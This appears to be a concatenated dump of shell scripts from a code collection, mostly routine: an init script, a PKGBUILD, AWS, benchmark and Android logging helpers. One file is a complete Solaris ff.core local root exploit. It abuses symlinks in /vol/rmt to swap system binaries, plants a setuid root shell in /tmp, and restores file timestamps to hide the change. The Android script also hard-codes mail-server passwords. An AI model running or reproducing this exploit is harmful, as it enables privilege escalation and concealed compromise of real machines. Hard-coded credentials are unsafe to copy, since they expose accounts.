] | permissive | #! /bin/sh
### BEGIN INIT INFO
# Provides: firewalld
# Required-Start: $remote_fs dbus
# Required-Stop: $remote_fs dbus
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: dynamic firewall daemon
# Description: firewalld is a dynamically managed firewall daemon
# with support for network/firewall zones to define
# the trust level of network connections or interfaces.
# It provides a D-Bus interface for services or
# applications to add and apply firewall rules on-the-fly.
### END INIT INFO
#
# Author: Michael Biebl <biebl@debian.org>
#
# PATH should only include /usr/* if it runs after the mountnfs.sh script
PATH=/sbin:/usr/sbin:/bin:/usr/bin
DESC="dynamic firewall daemon"
NAME=firewalld
DAEMON=/usr/sbin/firewalld
PIDFILE=/var/run/firewalld.pid
SCRIPTNAME=/etc/init.d/$NAME
# Exit if the package is not installed
[ -x "$DAEMON" ] || exit 0
if [ -f "/etc/default/$NAME" ];then . "/etc/default/$NAME";fi
# Define LSB log_* functions.
. /lib/lsb/init-functions
# Print the number of "container=" entries found in PID 1's environment,
# whitespace-stripped: "0" when running on the host, non-zero inside a
# container.  (cat -e renders the NUL-separated environ printable so grep
# can match it.)
is_container() {
    echo "$(cat -e /proc/1/environ |grep container=|wc -l|sed -e "s/ //g")"
}
# Filter a list of PIDs down to those belonging to the host itself.
# Inside a container every PID is kept; on the host, PIDs whose cgroup path
# contains /lxc/ (processes of LXC guests) are dropped.  Prints the
# surviving PIDs space-separated with leading/trailing blanks trimmed.
filter_host_pids() {
    pids=""
    if [ "x$(is_container)" != "x0" ];then
        pids="${pids} $(echo "${@}")"
    else
        for pid in ${@};do
            # grep -q exits 0 when /lxc/ is present; keep the PID only when it is not.
            if [ "x$(grep -q /lxc/ /proc/${pid}/cgroup 2>/dev/null;echo "${?}")" != "x0" ];then
                pids="${pids} $(echo "${pid}")"
            fi
        done
    fi
    # Strip leading/trailing spaces before returning the list.
    echo "${pids}" | sed -e "s/\(^ \+\)\|\( \+$\)//g"
}
# Apply site-specific firewalld rules when the Makina States helper script
# is installed and executable; silently a no-op otherwise.
do_makina_rules() {
    if [ -x /usr/bin/ms_firewalld.py ];then
        /usr/bin/ms_firewalld.py
    fi
}
do_stop()
{
    # Return
    #   0 if daemon has been stopped
    #   1 if daemon was already stopped
    #   other if daemon could not be stopped or a failure occurred
    start-stop-daemon --stop --quiet --retry 5 --pidfile $PIDFILE --name $NAME
    # Belt and braces: hunt down surviving firewalld python processes on the
    # host (container guests are excluded by filter_host_pids).
    pids=$(filter_host_pids $(ps aux|grep firewalld|grep python|awk '{print $2}'))
    if [ "x${pids}" != "x" ];then
        sleep 4
        # let a little more time for a chance to exit
        pids=$(filter_host_pids $(ps aux|grep firewalld|grep python|awk '{print $2}'))
    fi
    # Force-kill whatever is still alive after the grace period.
    for i in ${pids};do
        kill -9 ${i} || /bin/true
    done
}
do_start()
{
    # Return
    #   0 if daemon has been started
    #   1 if daemon was already running
    #   other if daemon could not be started or a failure occured
    # FIREWALLD_DISABLED/FIREWALLD_ARGS may be set via /etc/default/firewalld
    # (sourced at the top of this script).
    if [ "x${FIREWALLD_DISABLED}" = "x" ];then
        start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON -- ${FIREWALLD_ARGS}
        # Push site-specific rules once the daemon is up.
        do_makina_rules
    else
        # try to stop .. on start if the firewall is disabled
        do_stop
    fi
}
# Reload firewalld via SIGHUP and re-apply the Makina rules; when the
# firewall is disabled in /etc/default/firewalld, stop it instead.
do_reload()
{
    if [ "x${FIREWALLD_DISABLED}" = "x" ];then
        start-stop-daemon --stop --signal HUP --quiet --pidfile $PIDFILE --name $NAME
        do_makina_rules
    else
        do_stop
    fi
}
case "$1" in
start)
log_daemon_msg "Starting $DESC" "$NAME"
do_start
case "$?" in
0) log_end_msg 0 ;;
1) log_progress_msg "already started"
log_end_msg 0 ;;
*) log_end_msg 1 ;;
esac
;;
stop)
log_daemon_msg "Stopping $DESC" "$NAME"
do_stop
case "$?" in
0) log_end_msg 0 ;;
1) log_progress_msg "already stopped"
log_end_msg 0 ;;
*) log_end_msg 1 ;;
esac
;;
reload|force-reload)
log_daemon_msg "Reloading $DESC" "$NAME"
do_reload
log_end_msg $?
;;
restart)
$0 stop
$0 start
;;
status)
status_of_proc -p $PIDFILE $DAEMON $NAME && exit 0 || exit $?
;;
*)
echo "Usage: $SCRIPTNAME {start|stop|restart|force-reload|reload|status}" >&2
exit 3
;;
esac
| true |
1ae9bc4942fd0ff70469d9d2d8fff3dc6ed663f8 | Shell | ilventu/aur-mirror | /cwm-git/PKGBUILD | UTF-8 | 1,223 | 2.859375 | 3 | [] | no_license | # Maintainer: Christian Neukirchen <chneukirchen@gmail.com>
pkgname=cwm-git
pkgver=20111005
pkgrel=1
pkgdesc="OpenBSD fork of calmwm, a clean and lightweight window manager"
arch=(i686 x86_64)
url="http://www.openbsd.org/cgi-bin/man.cgi?query=cwm&sektion=1"
license=('custom')
depends=(libxft libxrandr libxinerama)
makedepends=(git pkg-config)
replaces=(cwm cwm-cvs)
conflicts=(cwm cwm-cvs)
source=(cwm.desktop)
md5sums=('42530ce5a23fc5f9088d891e325d99bd')
_gitroot="git://github.com/chneukirchen/cwm.git"
_gitname=cwm
_gitbranch=linux
build() {
cd "$srcdir"
msg "Connecting to GIT server...."
if [ -d $_gitname ] ; then
cd $_gitname && git fetch origin
msg "The local files are updated."
else
git clone --mirror $_gitroot $_gitname
fi
msg "GIT checkout done or server timeout"
msg "Starting make..."
rm -rf "$srcdir/$_gitname-build"
git clone "$srcdir/$_gitname" "$srcdir/$_gitname-build"
cd "$srcdir/$_gitname-build"
git checkout $_gitbranch
make
}
package() {
cd "$srcdir/$_gitname-build"
make DESTDIR="${pkgdir}" PREFIX=/usr install
install -D -m644 "${srcdir}/cwm.desktop" "${pkgdir}/usr/share/xsessions/cwm.desktop"
install -D -m644 LICENSE "${pkgdir}/usr/share/licenses/${pkgname}/LICENSE"
}
| true |
6f225328b097f1ac2e28459676636801e08e1428 | Shell | joshi-aditya/Expense-Manager | /infrastructure/aws/cloudformation/csye6225-aws-cf-terminate-stack.sh | UTF-8 | 381 | 3.453125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
read -p 'Enter stack name: ' STACK_NAME
STACK_ID=$(\
aws cloudformation delete-stack \
--stack-name ${STACK_NAME} \
)
echo "Waiting on deletion.."
aws cloudformation wait stack-delete-complete --stack-name ${STACK_NAME}
if [ $? -ne 0 ]; then
echo "Stack ${STACK_NAME} deletion failed!"
exit 1
else
echo "Stack ${STACK_NAME} deleted successfully!"
fi | true |
e621595113a4c311ea9143eaccd1c13d6ef7f9fc | Shell | ddbj/training | /D-STEP1/01_kawashima/sra2fastq_loop.sh | UTF-8 | 323 | 2.546875 | 3 | [] | no_license | #!/bin/sh
#$ -S /bin/bash
#$ -cwd
#$ -l short
#$ -l s_vmem=1G,mem_req=1G
#$ -o ./
#$ -e ./
source ~/.bashrc
FASTQDUMP="/usr/local/pkg/sra-tools/2.5.7/bin/fastq-dump.2.5.7"
Dbdir="/home/takeshik/tanomare/dstep20180126"
arr=( "ERR003990" )
for f in ${arr[@]}
do
make SRA=$f.sra
$FASTQDUMP --split-files $f.sra
done
| true |
11856781a0f4f513a8064b04077b4758ab31239d | Shell | feedcafe/hi-ubuntu | /android/script/klogcat | UTF-8 | 7,888 | 3.265625 | 3 | [] | no_license | #!/system/bin/sh
root_path="/data"
klogcat_path="$root_path/klogcat"
log_path="$klogcat_path/"`date +%F`
screencap_path="$log_path/screencap/"
plain_text_mail="false"
switch_channel()
{
RANGE=2
count=0
event=3
echo "###################################################################"
echo "# #"
echo "# switch channel test #"
echo "# #"
echo "###################################################################"
while true
do
num=$RANDOM
let "num %= $RANGE"
let count+=1
echo $count
if [ $num -eq 1 ]
then
# send keyevent F9
echo "send key F9"
# input keyevent F9
sendevent /dev/input/event$event 1 67 1
sendevent /dev/input/event$event 0 0 0
sendevent /dev/input/event$event 1 67 0
sendevent /dev/input/event$event 0 0 0
#sleep 20
else
# send keyevent F11
echo "send key F11"
# input keyevent F11
sendevent /dev/input/event$event 1 87 1
sendevent /dev/input/event$event 0 0 0
sendevent /dev/input/event$event 1 87 0
sendevent /dev/input/event$event 0 0 0
#sleep 20
fi
done
}
onoff_test()
{
count=0
while true
do
# send keyevent KEYCODE_ENTER
input keyevent 66
sleep 1
input keyevent 66
sleep 17
let count+=1
echo tested $count times
done
}
# get current screen shot
gtv_screencast()
{
if [ ! -d "$screencap_path" ]; then
mkdir -p $screencap_path
fi
screencap "$screencap_path/android-`date +%F-%H-%M-%S`.png"
}
# enable btsnoop for hci debug
btsnoop_enable()
{
bt_stack="/system/etc/bluetooth/bt_stack.conf"
mount -o remount,rw /system
busybox sed -i 's/BtSnoopLogOutput=false/BtSnoopLogOutput=true/g' $bt_stack
busybox sed -i 's/BtSnoopFileName=\/sdcard\/btsnoop_hci.log/BtSnoopFileName=\/data\/misc\/bluedroid\/btsnoop_hci.log/g' $bt_stack
# dump more log
busybox sed -i 's/TRC_BTM=2/TRC_BTM=5/g' $bt_stack
busybox sed -i 's/TRC_HCI=2/TRC_HCI=5/g' $bt_stack
busybox sed -i 's/TRC_L2CAP=2/TRC_L2CAP=5/g' $bt_stack
busybox sed -i 's/TRC_SDP=2/TRC_SDP=5/g' $bt_stack
busybox sed -i 's/TRC_GATT=2/TRC_GATT=5/g' $bt_stack
busybox sed -i 's/TRC_SMP=2/TRC_SMP=5/g' $bt_stack
busybox sed -i 's/TRC_BTAPP=2/TRC_BTAPP=5/g' $bt_stack
busybox sed -i 's/TRC_BTIF=2/TRC_BTIF=5/g' $bt_stack
}
gtv_get_bdaddr()
{
cat /sys/devices/virtual/bluetooth/hci0/address > $log_path/bdaddr.txt
}
gtv_getprop()
{
getprop > $log_path/getprop.txt
}
gtv_getip()
{
netcfg |grep eth0|busybox cut -d " " -f37
}
gtv_get_macaddr()
{
# mac address
netcfg |grep eth0|busybox cut -d " " -f40 > $log_path/macaddr.txt
}
gtv_bluetooth_status()
{
adb shell am start -n "com.android.settings/.bluetooth.BluetoothSettings"
gtv_screencast
}
gtv_pack_log()
{
cd $klogcat_path
busybox tar cvf klogcat.tar $log_path
busybox bzip2 -zvv klogcat.tar
# busybox stat -c "%s" klogcat.tar.bz2
# if attachment larger than 5 MB, script will send plain text mail
size=`busybox du -k $klogcat_path/klogcat.tar.bz2|busybox awk '{print $1}'`
max_size=5*1024
if [[ $size -lt $max_size ]]; then
echo "attachment not exceeds limit size (5 MB)"
plain_text_mail="false"
else
echo "attachment too large, send plain text mail"
plain_text_mail="true"
fi
}
# Check Internet reachability by pinging g.cn twice; prints
# "internet available" on success, an error message otherwise.
# Fix: the original wrote "else [ $? -eq 2 ]" -- 'else' takes no condition
# in shell, so that test ran as a discarded throwaway command.
gtv_internet_available()
{
	if ping -c 2 g.cn
	then
		echo "internet available"
	else
		echo "ping: unknown host g.cn"
	fi
}
# send plain text message using busybox sendmail applet
busybox_sendmail()
{
echo "###################################################################"
echo "# #"
echo "# send mail to module owner #"
echo "# using busybox swiss army knife #"
echo "# #"
echo "###################################################################"
# need a new line between subject and mail body
echo "Subject: $subject" > $log_path/mail.txt
echo "" >> $log_path/mail.txt
cat $log_path/getprop.txt >> $log_path/mail.txt
cat $log_path/mail.txt | busybox sendmail -v -S $mailserver \
-f $mailfrom -au"$username" -ap"$passwd" $mailto
}
# send plain text message using busybox sendmail applet
busybox_sendmail_with_attachment()
{
echo "###################################################################"
echo "# #"
echo "# send mail to module owner #"
echo "# using busybox makemime and sendmail #"
echo "# #"
echo "###################################################################"
busybox makemime -a "Subject: $subject" \
-o $klogcat_path/attachment \
$klogcat_path/klogcat.tar.bz2
cat $klogcat_path/attachment | busybox sendmail -v \
-S $mailserver -f $mailfrom \
-au"$username" -ap"$passwd" $mailto
}
# remove all the temp files
gtv_cleanup()
{
rm $klogcat_path/klogcat.tar*
rm $klogcat_path/attachment
# remove outdated traces.txt
if [ -f /data/anr/traces.txt ]; then
rm /data/anr/traces.txt
fi
pid=`busybox pidof getevent`
if [ $? -eq 0 ]; then
echo "killing getevent"
kill -15 $pid
else
# TODO: this message should goes to a error log file
echo "getevent already killed"
fi
pid=`busybox pidof logcat`
if [ $? -eq 0 ]; then
echo "killing logcat"
kill -15 $pid
else
# TODO: this message should goes to a error log file
echo "logcat already killed"
fi
}
# Select the SMTP relay used by the busybox sendmail helpers: sets the
# mailserver/mailfrom/username/passwd globals for the profile named in $1
# ("yeah" or "mail"); any other value leaves them untouched.
# SECURITY NOTE(review): credentials are hard-coded in this script and will
# leak via source control and process listings -- move them to a protected
# config file or the environment.
gtv_mail_server()
{
	if [ $1 = "yeah" ]; then
		mailserver="123.58.177.132" # smtp.yeah.net
		mailfrom="googletv@yeah.net"
		username="googletv"
		passwd="qwerty123"
	elif [ $1 = "mail" ]; then
		mailserver="74.208.5.15" # mail.com
		mailfrom="fudong@mail.com"
		username="fudong@mail.com"
		passwd="qwerty123"
	fi
	echo "mail server $1 selected"
}
# Collect auxiliary logs (bluetooth snoop + config), pack everything and
# mail the result to the module owner.
#   $1 - "true" selects the plain-text mail, anything else the attachment.
gtv_post_processing()
{
    # bluetooth hci log
    if [ -f "$root_path/misc/bluedroid/btsnoop_hci.log" ]; then
        cp "$root_path/misc/bluedroid/btsnoop_hci.log" "$log_path/"
    else
        # TODO: this message should go to an error log file
        echo "btsnoop file not found"
    fi
    cp "$root_path"/misc/bluedroid/bt_config.* "$log_path/"
    # pack all the log files
    gtv_pack_log
    # see if we can send mail to module owner
    #gtv_internet_available
    gtv_mail_server yeah
    mailto="fudong@mail.com"
    someone="Fudong"
    product="Vision"
    subject="$someone's $product has issue"
    # send mail to module owner; "$1" quoted so an empty/missing argument
    # no longer breaks the test expression
    if [ "$1" = "true" ]; then
        echo "sending plain text mail"
        busybox_sendmail
    else
        echo "sending mail with attachment"
        busybox_sendmail_with_attachment
    fi
}
# One-time setup: timezone, log directories, device info, and an
# interactive prompt for enabling the bluedroid HCI snoop log.
# NOTE: answering "No" exits the whole script (original behavior, kept).
gtv_prepare()
{
    # set timezone
    setprop persist.sys.timezone Asia/Shanghai
    # make sure the log directory exists
    if [ ! -d "$log_path" ]; then
        mkdir -p "$log_path"
    fi
    echo "log directory: $log_path"
    echo "screencap directory: $screencap_path"
    # get ethernet mac address
    gtv_get_macaddr
    # get bluetooth adapter mac address
    # gtv_get_bdaddr
    # get device info
    gtv_getprop
    # need bluetooth log?
    while true; do
        echo "Do you wish to enable bluedroid log? [Yes/No]"
        # -r keeps backslashes in the typed answer intact
        read -r yesno
        case $yesno in
            [Yy]* ) btsnoop_enable;
                break;;
            [Nn]* ) exit;;
            * ) echo "Please answer yes or no.";;
        esac
    done
}
# Collect bluetooth-related diagnostics: kernel messages plus the current
# bluetooth status.  Both helpers are defined earlier in this file.
gtv_bluetooth_log()
{
    # get kernel log
    gtv_kmsg
    # bluetooth settings
    gtv_bluetooth_status
}
# Start the long-running log collectors (logcat, getevent, kernel log) in
# the background; each file begins with a timestamp header.
gtv_common_log()
{
    # logcat -- the original redirected the stream with '>' here, which
    # clobbered the timestamp header it had just written; append instead,
    # matching the getevent/kmsg collectors below.
    echo `date +%F-%H-%M-%S` > "$log_path/logcat.txt"
    logcat -v time >> "$log_path/logcat.txt" &
    # getevent
    echo `date +%F-%H-%M-%S` > "$log_path/getevent.txt"
    getevent -lt >> "$log_path/getevent.txt" &
    # kernel log
    echo `date +%F-%H-%M-%S` > "$log_path/kmsg.txt"
    cat /proc/kmsg >> "$log_path/kmsg.txt" &
}
# Entry point: set up, start the collectors, mail the results, clean up.
main()
{
    gtv_prepare
    gtv_common_log
    # NOTE(review): gtv_post_processing compares its argument against the
    # literal "true", so "plain_text_mail" selects the attachment branch --
    # confirm that is the intended behavior.
    gtv_post_processing plain_text_mail
    gtv_cleanup
}
main
| true |
#!/bin/bash
#
# Capture the X screen, encode it to H.264 and mux the stream into an AVI.
# @author Andrew Ford
# Usage: ./gst-screencap-encode.sh [width] [height] [framerate] [bitrate] [file]

# Capture geometry and encoder settings from the command line.
WIDTH=$1
HEIGHT=$2
# Fixed: these used to read "$FPS=$3" / "$BITRATE=$4", which is not an
# assignment -- the shell expands the (empty) variable first and then tries
# to execute the result as a command ("=...: command not found").
FPS=$3
BITRATE=$4
OUTFILE=$5

VELEM="ximagesrc startx=0 starty=0 endx=$WIDTH endy=$HEIGHT use-damage=false"
VCAPS="video/x-raw-rgb, bpp=(int)32, depth=(int)24, endianness=(int)4321, red_mask=(int)65280, green_mask=(int)16711680, blue_mask=(int)-16777216, width=(int)$WIDTH, height=(int)$HEIGHT, framerate=(fraction)$FPS/1"
VENC="x264enc threads=4 byte-stream=true bitrate=$BITRATE me=1 trellis=false cabac=false"
VSOURCE="$VELEM ! $VCAPS ! queue ! videorate ! ffmpegcolorspace ! $VENC ! avimux ! filesink location=$OUTFILE"

# $VSOURCE is intentionally unquoted: gst-launch expects the pipeline
# description split into individual arguments.
gst-launch-0.10 -v $VSOURCE
509f773e331178701560b3416cd519281b5ac88d | Shell | ghsecuritylab/7620 | /package/network/config/netifd/src/scripts/utils.sh | UTF-8 | 754 | 3.671875 | 4 | [] | no_license | append() {
local var="$1"
local value="$2"
local sep="${3:- }"
eval "export -- \"$var=\${$var:+\${$var}\${value:+\$sep}}\$value\""
}
# add_default_handler NAME
# Define NAME as a no-op shell function unless a function of that name is
# already defined (provides optional hook points for sourced scripts).
add_default_handler() {
	case "$(type $1 2>/dev/null)" in
		*function*) return;;   # already defined -- keep the existing handler
		*) eval "$1() { return; }"
	esac
}
# set_default VAR VALUE
# Assign VALUE to the variable named VAR only if VAR is unset or empty;
# the variable is exported either way.
set_default() {
	local __s_var="$1"
	local __s_val="$2"
	eval "export -- \"$__s_var=\${$__s_var:-\$__s_val}\""
}
# Emit one [name, type] tuple per argument into the currently open JSON
# document (jshn json_add_* helpers).  $1 is the numeric type code; the
# remaining arguments are option names.
_config_add_generic() {
	local type="$1"; shift

	while [ $# -gt 0 ]; do
		json_add_array ""
		json_add_string "" "$1"
		json_add_int "" "$type"
		json_close_array
		shift
	done
}
# Convenience wrappers around _config_add_generic.  The numeric argument
# is the type code recorded next to each option name (presumably libubox
# blobmsg type ids -- confirm against the consumer of this JSON).
config_add_int() {
	_config_add_generic 5 "$@"
}
config_add_array() {
	_config_add_generic 1 "$@"
}
config_add_string() {
	_config_add_generic 3 "$@"
}
config_add_boolean() {
	_config_add_generic 7 "$@"
}
| true |
#!/bin/bash
# Dry-run helper: prints (rather than executes) the sshpass/scp/ssh
# commands used to copy scripts to the car host (10.18.92.130) and start
# the roscore screen session.  Remove the leading "echo"s to run for real.
echo ""
echo "Starting Car"
echo "------------"
echo "Launch Variables"
echo $@
echo " "
#Pass Files over to car
echo sshpass -p 'test' scp runClose.sh runStop.sh runLaunch.sh runSim.sh carStop.sh test@10.18.92.130:'~/Documents'
echo " "
#Create the ssh screen - to interact with and close files
echo sshpass -p 'test' ssh -T test@10.18.92.130 'screen -dmS Ssh'
echo " "
#This reconnects roscore screen and passes the launch file to it to execute.
# sshpass -p 'doan_1234' ssh -T nvidia@10.18.92.160 "cd ~/Documents; screen -r
#roscore; ./runLaunch.sh ${@}>> kpw_logfile.txt" #replace with a launch file
echo sshpass -p 'test' ssh -T test@10.18.92.130 "screen -dmS roscore ./runCar.sh"
echo " "
echo "Successfully running car"
echo "------------------------"
#!/bin/bash
# Toggle the GNOME Caps-Lock / Escape mapping via dconf: if the keys are
# currently swapped, restore normal behavior; if Caps is plain Caps-Lock,
# swap the two; otherwise leave the setting alone.

key=/org/gnome/desktop/input-sources/xkb-options
swapped="['caps:swapescape']"
capslock="['caps:capslock']"

current=$(dconf read $key)
echo "Current status: $current"

case "$current" in
    "$swapped")
        echo "Making caps and escape WORK NORMALLY"
        dconf write $key "$capslock"
        ;;
    "$capslock")
        echo "Swapping caps and escape"
        dconf write $key "$swapped"
        ;;
    *)
        echo "caps is not swapescaped nor capslock. Doing nothing."
        ;;
esac
| true |
f689bb8b20417c3c61db65ff007a9f2085218996 | Shell | shewey/exploit-db | /platforms/solaris/local/19258.sh | UTF-8 | 3,831 | 3.375 | 3 | [] | no_license | source: http://www.securityfocus.com/bid/327/info
There is a vulnerability in Solaris's ff.core utility which allows normal users to execute the rename command as root. This particular bug when levereged against a series of other configuration issues in a standard Solaris setup can lead to a root compromise. An example of tthis attack excecuted via the ff.core rename attack coul.d be as follows:
1. rename /usr/bin/sh /usr/bin/admintool
2. rename /usr/sbin/swmtool /usr/sbin/in.rlogind
3. telnet localhost login and clean up
Detailed messages concerning this problem and related fixes are attached to this Vulnerability in the Referance section.
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following exploit was provided:
#!/bin/sh
# /usr/openwin/bin/ff.core exploit - horizon
# tested on 2.5.1, 2.6 and Solaris 7 (2.7)
# thanks to joej, adm, and joej :>
# if you want to exploit 2.5, you can just make this move /etc/group over
# /etc/shadow. you will probably want to move /etc/shadow to /etc/s.bak
# first test if we can pull this off
echo "Testing if exploit is possible..."
if [ -x /usr/openwin/bin/ff.core ]
then
:
else
echo "ff.core isn't there or executable. :/"
exit 1
fi
if [ -w /vol/rmt ]
then
:
else
echo "We can't do the symlink. :<"
exit 1
fi
mkdir /tmp/.test42
touch /tmp/.test42/bob
rm -f /vol/rmt/diskette0
ln -fs /tmp/.test42 /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/bob jim /floppy/ 2>/dev/null
if [ -f /tmp/.test42/jim ]
then
echo "Test successful. Proceeding..."
else
echo "Hmmm.. doesn't look like this is going to work :/"
exit 1
fi
rm -rf /tmp/.test42
# lets make some backups
echo "Backing up clobbered files to /tmp/.bk"
mkdir /tmp/.bk
#save admintools times
touch /tmp/.bk/admintool
touch -r /usr/bin/admintool /tmp/.bk/admintool
#save rloginds times
touch /tmp/.bk/in.rlogind
touch -r /usr/sbin/in.rlogind /tmp/.bk/in.rlogind
#save a copy of /usr/bin/sh
cp /usr/bin/sh /tmp/.bk
touch -r /usr/bin/sh /tmp/.bk/sh
echo "Doing sploit..."
rm -f /vol/rmt/diskette0
ln -fs /usr/bin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/admintool admintool.bak /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/bin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/sh admintool /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/sbin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/in.rlogind in.rlogind.bak /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/sbin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/swmtool in.rlogind /floppy/ 2>/dev/null
echo "Done with sploit. Testing and trying to clean up now..."
sleep 1
(sleep 2;echo " cp /bin/rksh /tmp/bob; chmod 4755 /tmp/bob; exit; ") | telnet localhost login
sleep 1
if [ -f /tmp/bob ]
then
echo "w00p! Should have a suid root sh in /tmp/bob"
echo "btw, its rksh because solaris is silly"
echo "Let me try to clean up my mess..."
else
echo "hrmmph.. didnt work. hope shits not screwed up bad :/"
exit 1
fi
echo "
cp /tmp/.bk/sh /usr/bin/sh
chmod 555 /usr/bin/sh
chown bin /usr/bin/sh
chgrp root /usr/bin/sh
touch -r /tmp/.bk/sh /usr/bin/sh
mv /usr/bin/admintool.bak /usr/bin/admintool
touch -r /tmp/.bk/admintool /usr/bin/admintool
rm -f /usr/sbin/swmtool
ln -s /usr/bin/admintool /usr/sbin/swmtool
touch -r /usr/bin/admintool /usr/sbin/swmtool
rm -f /usr/sbin/in.rlogind
mv /usr/sbin/in.rlogind.bak /usr/sbin/in.rlogind
touch -r /tmp/.bk/in.rlogind /usr/sbin/in.rlogind
rm -rf /tmp/.bk
" | /tmp/bob
echo "everything should be cool.. i think :>"
/tmp/bob | true |
9bdea7c62fb63f8c84c5da7d36e26b618a63720a | Shell | karlosss/mtg | /scripts/borrow.sh | UTF-8 | 651 | 2.96875 | 3 | [
"MIT"
#!/bin/bash
# Compute the "borrow list" for the deck at URL $1: cards required by the
# deck minus the ones currently missing from the collection, then merge
# that list into a named file under the borrowed/ directory.

# Base directory of the mtg tooling -- was hardcoded nine times before.
MTG=/home/karlos/mtg

"$MTG/scripts/url_to_pc.sh" "$1" > /tmp/x
comm -23 /tmp/x <("$MTG/scripts/human_to_pc.sh" <("$MTG/scripts/currently_missing.sh" "$1") /dev/stdout) > /tmp/y
echo "BORROW LIST:"
echo "------------"
"$MTG/scripts/pc_to_human.sh" /tmp/y /dev/stdout
echo "------------"
echo -n "Enter file name: "
# -r keeps backslashes in the typed name intact
read -r f
if [ -f "$MTG/borrowed/$f" ]
then
    # Existing borrow file: merge the new list into it.
    "$MTG/scripts/human_to_pc.sh" "$MTG/borrowed/$f" /tmp/x
else
    > /tmp/x
fi
"$MTG/scripts/pc_to_human.sh" <(cat /tmp/x /tmp/y) /tmp/z
mv /tmp/z "$MTG/borrowed/$f"
rm /tmp/x /tmp/y
echo "Cards borrowed."
# Load the user environment (PATH etc.); skip quietly if it is absent.
[ -f /home/fs/ylu/.bashrc ] && source /home/fs/ylu/.bashrc

# Extract every tarball in the current directory into a folder named after
# its first nine characters.  The original piped `ls` through `cut`/`xargs`
# to pre-create the folders, which breaks on unusual file names and
# duplicates the prefix logic; deriving the folder from ${f:0:9} inside the
# loop keeps the two in sync.
for f in *.tar
do
    [ -e "$f" ] || continue   # no *.tar files at all -- glob stayed literal
    dir=${f:0:9}
    mkdir -vp "$dir"
    tar -xvf "$f" -C "$dir"/
    echo "uncompressed file $f to folder $dir/"
done
| true |
#!/bin/bash
# Run the PARSEC streamcluster and dedup benchmarks under a set of
# interposed lock libraries (litl), at increasing core counts, appending
# /usr/bin/time output to per-core result files.
set -x
# $1 --> iso input to be used, fedora-core image provided in the dataset
INPUT_ISO=$1
LOCK_DIR=./../../ulocks/src/litl

LOCKS=(libmcs_spinlock.sh libhmcs_original.sh \
    libaqswonode_spinlock.sh libcbomcs_spinlock.sh \
    libcna_spinlock.sh libmalthusian_spinlock.sh \
    libpthreadinterpose_original.sh libmutexee_original.sh \
    libmcstp_original.sh libaqmwonode_spin_then_park.sh)
DIR=streamcluster-results

# `seq 1 1` => a single repetition; raise the upper bound for more runs.
for i in `seq 1 1`
do
    for l in "${LOCKS[@]}"
    do
        mkdir -p "${DIR}/$i/$l"
        for c in 1 2 4 12 `seq 24 24 192`
        do
            # Pin the run to the first $c logical CPUs.
            /usr/bin/time "${LOCK_DIR}/${l}" \
                taskset -c 0-$(($c-1)) \
                ./pkgs/kernels/streamcluster/inst/amd64-linux.gcc/bin/streamcluster \
                10 20 32 4096 4096 1000 none output.txt $c 2>> "${DIR}/$i/$l/core.${c}" >> "${DIR}/$i/$l/core.${c}"
        done
    done
done

LOCKS=(libpthreadinterpose_original.sh libhmcs_original.sh \
    libmcs_spinlock.sh libcna_spinlock.sh \
    libaqswonode_spinlock.sh libaqmwonode_spin_then_park.sh)
DIR=dedup-results

# dedup needs the ISO input; previously a missing $1 silently produced
# runs with an empty "-i" argument.
if [ -z "$INPUT_ISO" ]; then
    echo "warning: no input ISO given (arg 1); skipping the dedup runs" >&2
else
    for i in `seq 1 1`
    do
        for l in "${LOCKS[@]}"
        do
            mkdir -p "${DIR}/$i/$l"
            for c in 1 2 4 12 `seq 24 24 192`
            do
                /usr/bin/time "${LOCK_DIR}/${l}" \
                    ./pkgs/kernels/dedup/inst/amd64-linux.gcc/bin/dedup \
                    -c -p -v \
                    -i "${INPUT_ISO}" \
                    -o /dev/null -t $c 2>> "${DIR}/$i/$l/core.${c}" >> "${DIR}/$i/$l/core.${c}"
            done
        done
    done
fi
077aa1e7d31a1401fd84be73463d6129807f1b45 | Shell | raverjulie/lists | /axp-list/August2000/att-ade-rebuild_ | UTF-8 | 12,133 | 3.515625 | 4 | [] | no_license | #!/bin/bash
################################################################################
# Compiles a KDE2 snapshot. #
# 2000 by Frerich Raabe <raabe@kde.org> #
################################################################################
# Where are your KDE sources?
#
SRCDIR=/discs/c7/kdeb4
# Where shall I put the binaries?
#
KDE2DIR=/discs/deskapps/built/kde
# Where is your Qt 2.2.0?
#
QTDIR=/discs/c7/kde-built/qt-2.2.0-beta2
# If you would like logfiles of the compilation process, specify a directory
# here in which the logfiles will be saved. If you want to disable logfile
# generation, leave this blank.
#
LOGDIR=$SRCDIR/log
# It is a good idea to remove the configuration directories of the previous
# KDE desktop by deleting ~/.kderc and ~/.kde. If you would like to have this
# script do this automatically for you, add the home directories of the users
# whose KDE configuration should be resetted to this space seperated list.
#
HOMEDIR=""
# Do you want the logfiles to be compressed? Set this variable to "yes" to
# make the script compress the logfiles using bzip2 (using gzip as a
# fallback is bzip2 cannot be found) and thereby save some diskspace
COMPRESSLOGS=yes
# Add modules you want to get compiled to this space-seperated list. Please
# note that the modules kde-qt-addon, kdesuppor, kdelibs, and kdebase
# (if you want a KDE2 desktop and not just develope applications for it)
# must be compiled in exactly that order. Any other modules are optional.
#
MODULES="kdesupport kdelibs kdebase kdegraphics kdenetwork \
kdegames kdeadmin kdetoys kdeutils kdepim kdemultimedia koffice"
# Do you want a clean install? This is recommended but please note that
# you cannot use your previous KDE2 desktop while the compilation is
# running. Set this to "no" to install the new snapshot over the previous
# one, otherwise set it to "yes".
#
INSTALLFROMSCRATCH=no
# Do you plan to use this box otherwise while compiling? If so, you'd
# probably set this variable to "yes". If this is set to "no", the
# compilation process will try to eat up all the ressources, which speeds up
